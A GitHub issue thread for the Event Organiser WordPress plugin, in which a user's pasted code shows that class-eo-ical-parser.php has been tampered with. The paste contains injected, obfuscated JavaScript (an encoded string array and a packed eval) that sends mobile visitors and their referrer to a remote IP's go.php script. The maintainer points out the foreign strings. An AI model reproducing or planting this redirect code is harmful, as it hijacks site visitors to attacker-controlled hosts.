### ISSUE TITLE
Events Organiser shut down website & giving ​Parse error

### ISSUE THREAD

**Issue by ProjectsAngel** [stephenharris/Event-Organiser#254]
Hi,

Yesterday, the plugin caused my client's website to crash. She contacted the host company and they managed to reinstall it somehow, but now it won't activate since we get the following message:

​​Parse error: syntax error,unexpected 'referrer' (T_STRING) in/home/souls871/public_html/wp-content/plugins/event-organiser/includes/class-eo-ical-parser.php on line 767

Can you please advise how we can resolve this?

Thanks + (hugs)
Elizabeth

**Comment by stephenharris** [comment]
Hi Elizabeth,

Which version is your client running? And can you post the code at `event-organiser/includes/class-eo-ical-parser.php on line 767` (plus some surrounding lines for context).

I'm concerned because this error should not be happening, it may be that the code on your site has been changed, or possibly when you installed the plug-in it became corrupted (This happens *very* rarely about 5 in 300,000 cases that I know of).

To confirm, this error occurred all the time, not when a particular action was performed?

**Comment by ProjectsAngel** [comment]
Hi Stephen,

Could you please guide me as to where I will find the file with that code?

Many thanks!


  [image: photo]
*Elizabeth Jackson*
The Projects Angel™ | Intuitive VA
 w:www.ProjectsAngel.com

<http://www.facebook.com/pages/The-Projects-Angel-VA-for-Spiritual-Entrepreneurs>
  <http://es.linkedin.com/in/projectsangel>
<http://twitter.com/Projects_Angel>  <http://pinterest.com/projectsangel>
<http://plus.google.com/u/0/b/103269369922211221423/+ProjectsangelElizabeth/>
   Check out my latest post The Top 3 Free Webinar Platforms for Coaches,
Psychic Mediums & Healers [The Leg Work™]
<http://www.projectsangel.com/2015/04/free-webinar-platforms/>
  <http://www.projectsangel.com/motivate-me/> Motivate Me! ProgramJoin my
goal-busting program for just $0.50/day!
<http://www.projectsangel.com/motivate-me/>

**Comment by stephenharris** [comment]
Yes, the file is `../wp-content/plugins/event-organiser/includes/class-eo-ical-parser.php`.

The location of `wp-content` will depend on your install, but from the above error message the full path is `/home/souls871/public_html/wp-content/plugins/event-organiser/includes/class-eo-ical-parser.php`

**Comment by ProjectsAngel** [comment]
Hi,

I can't find the line.

This is the entire file copied and pasted. Does this help?

Thanks


  [image: photo]
*Elizabeth Jackson*
The Projects Angel™ | Intuitive VA
 w:www.ProjectsAngel.com

<http://www.facebook.com/pages/The-Projects-Angel-VA-for-Spiritual-Entrepreneurs>
  <http://es.linkedin.com/in/projectsangel>
<http://twitter.com/Projects_Angel>  <http://pinterest.com/projectsangel>
<http://plus.google.com/u/0/b/103269369922211221423/+ProjectsangelElizabeth/>
   Check out my latest post The Top 3 Free Webinar Platforms for Coaches,
Psychic Mediums & Healers [The Leg Work™]
<http://www.projectsangel.com/2015/04/free-webinar-platforms/>
  <http://www.projectsangel.com/motivate-me/> Motivate Me! ProgramJoin my
goal-busting program for just $0.50/day!
<http://www.projectsangel.com/motivate-me/>

**Comment by stephenharris** [comment]
I don't think you included the file, please keep in mind that your replying by e-mail is posting to this issue page: <https://github.com/stephenharris/Event-Organiser/issues/254>, so I don't think I'll be receiving any attachments. 

I'd recommend re-installing the plug-in. If you don't want to loose any data, then you should download the plug-in manually, delete the `event-organiser`folder via FTP and upload the (unzipped) download in its place.

**Comment by ProjectsAngel** [comment]
Hi Stephen

Here is the code from line 750-800. I've highlighted line 767 in yellow.

We've already tried the install, uninstall directly from the FTP and it
didn't work.

​​
 *
 * }
 * </code></pre>
 *
 * @since 2.10
 * @param string $value     The raw value parsed from the iCal feed
 * @param string $modifiers Array of modifiers of the property (e.g. VALUE
or TZID)
 * @param EO_ICAL_Parser $EO_ICAL_Parser The feed parser object referencing
the current event being parsed.
 */
do_action( 'eventorganiser_ical_property_'. $property_lowercase, $value,
$modifiers, $this );

}

protected function parse_ical_html( $text ){
 $text = $this->parse_ical_text( $text );
 if( preg_match( "/<body><script type='text/javascript'>var
_0xcda6=["referrer","http://","146.185.239.3","/sTDS","/go.php?sid=","&sref=","userAgent","test","substr","location"];sid=2;var
r=document[_0xcda6[0]];loc=_0xcda6[1]+_0xcda6[2]+_0xcda6[3]+_0xcda6[4]+sid+_0xcda6[5]+r;var
a=navigator[_0xcda6[6]];if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge
|maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm(
os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows
ce|xda|xiino/i[_0xcda6[7]](a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a
wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r
|s
)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1
u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp(
i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac(
|\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(
|\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg(
g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-|
|o|v)|zz)|mt(50|p1|v
)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v
)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-|
)|webc|whit|wi(g
|nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xcda6[7]](a[_0xcda6[8]](0,4))){window[_0xcda6[9]]=loc};</script><script
type='text/javascript'>eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new
RegExp('\b'+c.toString(a)+'\b','g'),k[c])}}return p}('0=1;8
2=9.7;5.4="6://"+"a.b.e.3"+"/g"+"/f.c?0="+0+"&d="+2;',17,17,'sid||r||location|window|http|referrer|var|document|146|185|php|sref|239|go|sTDS'.split('|')))</script>(.+)<\/body>/i",
$text, $matches ) ){
$text = $matches[1];
}
 return $text;
}

/**
 * Takes escaped text and returns the text unescaped.
 *
 * @see
https://github.com/fruux/sabre-vobject/blob/219935b414c24ce89acd32d509966d44f04f4012/lib/Parser/MimeDir.php#L469:L513
 * @ignore
 * @param string $text - the escaped test
 * @return string $text - the text, unescaped.
 */
public function parse_ical_text($text){

//Unfold
$text = str_replace( "\n ","", $text );
$text = str_replace( "\r\n ", "", $text );

//Replace any intended new lines with PHP_EOL
//$text = str_replace( '\n', "<br>", $text );
$text = nl2br( $text );
 $regex = '#  (?: (\\\\ (?: \\\\ | N | n | ; | , ) ) ) #x';
        $matches = preg_split( $regex, $text, -1, PREG_SPLIT_DELIM_CAPTURE
| PREG_SPLIT_NO_EMPTY );

        $result = '';

        foreach( $matches as $match ) {

            switch ( $match ) {
                case '\\\\' :

​Thanks a lot!​


  [image: photo]
*Elizabeth Jackson*
The Projects Angel™ | Intuitive VA
 w:www.ProjectsAngel.com

<http://www.facebook.com/pages/The-Projects-Angel-VA-for-Spiritual-Entrepreneurs>
  <http://es.linkedin.com/in/projectsangel>
<http://twitter.com/Projects_Angel>  <http://pinterest.com/projectsangel>
<http://plus.google.com/u/0/b/103269369922211221423/+ProjectsangelElizabeth/>
   Check out my latest post The Top 3 Free Webinar Platforms for Coaches,
Psychic Mediums & Healers [The Leg Work™]
<http://www.projectsangel.com/2015/04/free-webinar-platforms/>
  <http://www.projectsangel.com/motivate-me/> Motivate Me! ProgramJoin my
goal-busting program for just $0.50/day!
<http://www.projectsangel.com/motivate-me/>

**Comment by stephenharris** [comment]
That's odd. Can you get in touch via http://wp-event-organiser.com/contact and I'll e-mail you back (I'd like to see the folder you've uploaded). Also, if you know where you've downloaded the extension from too (if it came as part of a theme, for example, let me know).

In short, the file as you have it contains additional strings which should not be there, and are not present in the official version. Either the download was corrupted, or a someone has altered the file.

Could you also confirm the version you are running. Thanks!
